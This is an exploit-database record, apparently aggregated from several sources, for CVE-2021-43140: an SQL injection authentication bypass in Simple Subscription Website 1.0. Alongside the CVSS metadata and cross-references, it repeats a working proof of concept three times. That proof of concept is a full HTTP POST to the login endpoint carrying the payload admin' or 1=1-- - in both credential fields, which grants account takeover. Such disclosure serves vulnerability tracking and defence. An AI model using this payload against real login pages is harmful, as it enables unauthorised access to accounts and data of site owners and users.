Simple Subscription Website 1.0 - SQL injection Authentication Bypass Vulnerability

2021-11-15T00:00:00

Description

{"id": "1337DAY-ID-37042", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Simple Subscription Website 1.0 - SQL injection Authentication Bypass Vulnerability", "description": "", "published": "2021-11-15T00:00:00", "modified": "2021-11-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/37042", "reporter": "Daniel Haro", "references": [], "cvelist": ["CVE-2021-43140"], "immutableFields": [], "lastseen": "2021-12-04T15:48:12", "viewCount": 124, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-43140"]}, {"type": "exploitdb", "idList": ["EDB-ID:50522"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164968"]}], "rev": 4}, "score": {"value": 5.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-43140"]}, {"type": "exploitdb", "idList": ["EDB-ID:50522"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164968"]}]}, "exploitation": null, "vulnersScore": 5.8}, "sourceHref": "https://0day.today/exploit/37042", "sourceData": "# Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass\n# Exploit Author: Daniel Haro (Dirox)\n# Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html\n# Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html\n# Version: Simple Subscription Website 1.0\n# Tested on: Windows, xampp\n# CVE: CVE-2021-43140\n\n- Description:\nSQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. An account takeover exists with the payload: admin' or 1=1-- -\n\nPoC:\n\nPOST /plan_application/Actions.php?a=login HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 57\nOrigin: http://127.0.0.1\nConnection: close\nReferer: http://127.0.0.1/plan_application/admin/login.php\nCookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3\n\nusername=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+-\n", "category": "web applications", "verified": true, "_state": {"dependencies": 1646116073}}

{"cve": [{"lastseen": "2022-03-23T19:38:29", "description": "SQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. via the login.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T19:15:00", "type": "cve", "title": "CVE-2021-43140", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43140"], "modified": "2021-11-17T02:36:00", "cpe": ["cpe:/a:simple_subscription_website_project:simple_subscription_website:1.0"], "id": "CVE-2021-43140", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43140", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:simple_subscription_website_project:simple_subscription_website:1.0:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2021-11-15T21:42:41", "description": "", "cvss3": {}, "published": "2021-11-15T00:00:00", "type": "packetstorm", "title": "Simple Subscription Website 1.0 SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-43140"], "modified": "2021-11-15T00:00:00", "id": "PACKETSTORM:164968", "href": "https://packetstormsecurity.com/files/164968/Simple-Subscription-Website-1.0-SQL-Injection.html", "sourceData": "`# Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass \n# Exploit Author: Daniel Haro (Dirox) \n# Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html \n# Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html \n# Version: Simple Subscription Website 1.0 \n# Tested on: Windows, xampp \n# CVE: CVE-2021-43140 \n \n- Description: \nSQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. An account takeover exists with the payload: admin' or 1=1-- - \n \nPoC: \n \nPOST /plan_application/Actions.php?a=login HTTP/1.1 \nHost: 127.0.0.1 \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0 \nAccept: application/json, text/javascript, */*; q=0.01 \nAccept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding: gzip, deflate \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nContent-Length: 57 \nOrigin: http://127.0.0.1 \nConnection: close \nReferer: http://127.0.0.1/plan_application/admin/login.php \nCookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3 \n \nusername=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+- \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164968/ssw10-sql.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-13T17:34:27", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-15T00:00:00", "type": "exploitdb", "title": "Simple Subscription Website 1.0 - SQLi Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-43140", "CVE-2021-43140"], "modified": "2021-11-15T00:00:00", "id": "EDB-ID:50522", "href": "https://www.exploit-db.com/exploits/50522", "sourceData": "# Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass\r\n# Exploit Author: Daniel Haro (Dirox)\r\n# Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html\r\n# Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html\r\n# Version: Simple Subscription Website 1.0\r\n# Tested on: Windows, xampp\r\n# CVE: CVE-2021-43140\r\n\r\n- Description:\r\nSQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. An account takeover exists with the payload: admin' or 1=1-- -\r\n\r\nPoC:\r\n\r\nPOST /plan_application/Actions.php?a=login HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 57\r\nOrigin: http://127.0.0.1\r\nConnection: close\r\nReferer: http://127.0.0.1/plan_application/admin/login.php\r\nCookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3\r\n\r\nusername=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+-", "sourceHref": "https://www.exploit-db.com/download/50522", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

Simple Subscription Website 1.0 - SQL injection Authentication Bypass Vulnerability

Description

Related